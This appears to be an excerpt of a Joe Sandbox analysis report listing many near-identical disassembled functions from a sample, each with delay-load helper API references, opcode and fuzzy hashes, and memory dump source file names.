                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileType
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3081899298-0
                                                                                                                                                      • Opcode ID: 5edb08bedaa74f1e0c76c10478093fc2bef90eab9c2e386373ba8d0f55162464
                                                                                                                                                      • Instruction ID: a9ec50a60c5e0c859c811a2c11835d9996af07c07e3b56b029adff53c2d9303d
                                                                                                                                                      • Opcode Fuzzy Hash: 5edb08bedaa74f1e0c76c10478093fc2bef90eab9c2e386373ba8d0f55162464
                                                                                                                                                      • Instruction Fuzzy Hash: 74C00234400219DA8E218B2CB8594997622AA627B67B497B4D129895E1C3328DE7EA11
                                                                                                                                                      Function 00A449A3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: d50670ee038d97145e04fd0e49d5ea48ed4e18d0f63f02627b478327a7d7f482
                                                                                                                                                      • Instruction ID: a072dae85459604b75fe8fb039814d2e6d8094e73826ff3f39a8b5c5b303714c
                                                                                                                                                      • Opcode Fuzzy Hash: d50670ee038d97145e04fd0e49d5ea48ed4e18d0f63f02627b478327a7d7f482
                                                                                                                                                      • Instruction Fuzzy Hash: C7B012A926C020BC320451343F02E3F012CD1C8F10330CB2AF404C1042D4418E451131
                                                                                                                                                      Function 00A449B7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: 1dfc296fc10bf950756a3ce9df9d24667f95ca8cd1ed63cbcb95f0516df69e7a
                                                                                                                                                      • Instruction ID: e3d23fc68519ae8914717e1cb858db6ce70a2623a37558506594ca4ca479bd2f
                                                                                                                                                      • Opcode Fuzzy Hash: 1dfc296fc10bf950756a3ce9df9d24667f95ca8cd1ed63cbcb95f0516df69e7a
                                                                                                                                                      • Instruction Fuzzy Hash: 84B0129926D110BC320451343E02E3F012DD1C9F10730CB1AF404C1082D8408C441131
                                                                                                                                                      Function 00A44985 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: 025d6f17d5470e59e115a08f86ffc23e3cf24dc4ad0852a1ba785561cea40438
                                                                                                                                                      • Instruction ID: b6d80f3d326c15d4cb218df237e2a02a25aaa474358931e4e413a1ff9f3dff20
                                                                                                                                                      • Opcode Fuzzy Hash: 025d6f17d5470e59e115a08f86ffc23e3cf24dc4ad0852a1ba785561cea40438
                                                                                                                                                      • Instruction Fuzzy Hash: D5B0129926C010BC320851743E02E3F022CE1C8F10330CF2AF004C1142E4408C481131
                                                                                                                                                      Function 00A4498F Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: 19a86a655a925ced390f4034b13737f3d2d1a92428aa047bc2bc5b47fac1a958
                                                                                                                                                      • Instruction ID: 8c446e29c256fc0cd552481ab42ea2d6e89920002ca43276a641cc7bba8dfcfb
                                                                                                                                                      • Opcode Fuzzy Hash: 19a86a655a925ced390f4034b13737f3d2d1a92428aa047bc2bc5b47fac1a958
                                                                                                                                                      • Instruction Fuzzy Hash: 34B012A926C120BC320451343E02E3F012CD1C9F10330CB1AF404C1042D4408D441131
                                                                                                                                                      Function 00A44999 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: ea65a90c9b91c49efd9af3af4db56b11457fd6cf8a2b295a8b9b079f79e3b6aa
                                                                                                                                                      • Instruction ID: 5cc5ff0a157b7c63863aa9d9ed1dcef58e71929c8c14428cf7dd2d35205b3d9a
                                                                                                                                                      • Opcode Fuzzy Hash: ea65a90c9b91c49efd9af3af4db56b11457fd6cf8a2b295a8b9b079f79e3b6aa
                                                                                                                                                      • Instruction Fuzzy Hash: 67B012A926C120BC334451343E02E3F012CD1C8F10330CB2AF004C1442D4408D841131
                                                                                                                                                      Function 00A449C1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: cd58d3a3718811d5d01662e0072e5cfc1c01726b43cb98f837b8940b2802459c
                                                                                                                                                      • Instruction ID: 70b26f5af56aabf7720e439e9eecd3b20467b88c1fd920448446e2c1856ffa19
                                                                                                                                                      • Opcode Fuzzy Hash: cd58d3a3718811d5d01662e0072e5cfc1c01726b43cb98f837b8940b2802459c
                                                                                                                                                      • Instruction Fuzzy Hash: 10B012A926D110BC334452343E02E3F012DD1C8F10730CB2AF004C1442D8408C841131
                                                                                                                                                      Function 00A449D5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: cc0d1d447205d104c2428434b934f8da9ec72543efdefd194169a57fe289121c
                                                                                                                                                      • Instruction ID: d55eb2829aec3320260fe5d033b8f28849409e56f0a42ebba0ec29436919c70a
                                                                                                                                                      • Opcode Fuzzy Hash: cc0d1d447205d104c2428434b934f8da9ec72543efdefd194169a57fe289121c
                                                                                                                                                      • Instruction Fuzzy Hash: B8B0129927D010BC320451343E02E3F026EE5C8F10730CB1AF004C1042D8408C441131
                                                                                                                                                      Function 00A44921 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: 304051676e768fcb06157f8367120396e63185b83e1de5d6e423a94a0200b231
                                                                                                                                                      • Instruction ID: c11cd342da13df50726f5c55ea65914f4f3f10e9c657b295f93df697a05fd6d9
                                                                                                                                                      • Opcode Fuzzy Hash: 304051676e768fcb06157f8367120396e63185b83e1de5d6e423a94a0200b231
                                                                                                                                                      • Instruction Fuzzy Hash: B2B0129926C110BC334451347E02E3F023CD1C8F10330CB2AF004C1442D4408C841131
                                                                                                                                                      Function 00A4492B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: 8452911249a99d9a1cd25709167a76d8ad36c318396551ed7874612ee2c0d6ae
                                                                                                                                                      • Instruction ID: efef0adee468cbfd558698f2cbe99de82729ac27bf99e37438dae4207fb4b830
                                                                                                                                                      • Opcode Fuzzy Hash: 8452911249a99d9a1cd25709167a76d8ad36c318396551ed7874612ee2c0d6ae
                                                                                                                                                      • Instruction Fuzzy Hash: 0DB0129926C010BC320451347F02E3F023CD1C8F10370CB2AF404C1042D4418D451131
                                                                                                                                                      Function 00A44935 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: df72a7d49a800219086b06d3b552dcfc9843a8b66ed69dbf72c296cd8e5cedcf
                                                                                                                                                      • Instruction ID: 1f53a02644231addecff6c5c28ecf919abee1de9f6e3ec7ec2e99041e7841cb5
                                                                                                                                                      • Opcode Fuzzy Hash: df72a7d49a800219086b06d3b552dcfc9843a8b66ed69dbf72c296cd8e5cedcf
                                                                                                                                                      • Instruction Fuzzy Hash: 25B0129927C110BC320451347E02E3F033CE1C8F10330CB1BF004C1042D4408C441131
                                                                                                                                                      Function 00A4493F Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: ffdbb3097a45653ca26fbdd3328a8161f718dc1b6aa5cef2aecc00b88ce9f713
                                                                                                                                                      • Instruction ID: 9a003c84d7c646492a841c8c150f1f2e02730ab5aacb26665b28f3e18565419c
                                                                                                                                                      • Opcode Fuzzy Hash: ffdbb3097a45653ca26fbdd3328a8161f718dc1b6aa5cef2aecc00b88ce9f713
                                                                                                                                                      • Instruction Fuzzy Hash: B4B0129D26C210BC320451343E12E3F012CD1C9F10330CB1AF404C1142D8409C441131
                                                                                                                                                      Function 00A44906 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: ed86da10e61a1f34294701db00bba2fd81a0ec250ac967191675ac3cc71f23dd
                                                                                                                                                      • Instruction ID: 3388b6fe34842c98850512e5b39bc39d4369fa3367cbda087a671b82973cc56d
                                                                                                                                                      • Opcode Fuzzy Hash: ed86da10e61a1f34294701db00bba2fd81a0ec250ac967191675ac3cc71f23dd
                                                                                                                                                      • Instruction Fuzzy Hash: 88B012A936C010BC320411303F02E3F012CD1C4F20330CB2AF400C005398429D451031
                                                                                                                                                      Function 00A44967 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: 3f2498114e5c31157a7332ce6e799f2cf1f608020eabbc828764919a4d969c45
                                                                                                                                                      • Instruction ID: b89b6f7dd7ee2da175a8ff13110ca7168918549a9386d67efab5d26f51762a53
                                                                                                                                                      • Opcode Fuzzy Hash: 3f2498114e5c31157a7332ce6e799f2cf1f608020eabbc828764919a4d969c45
                                                                                                                                                      • Instruction Fuzzy Hash: F1B0129926C111BC320855343E02E3F012CD1C9F10330CB2AF404C1142D4408C481131
                                                                                                                                                      Function 00A4497B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
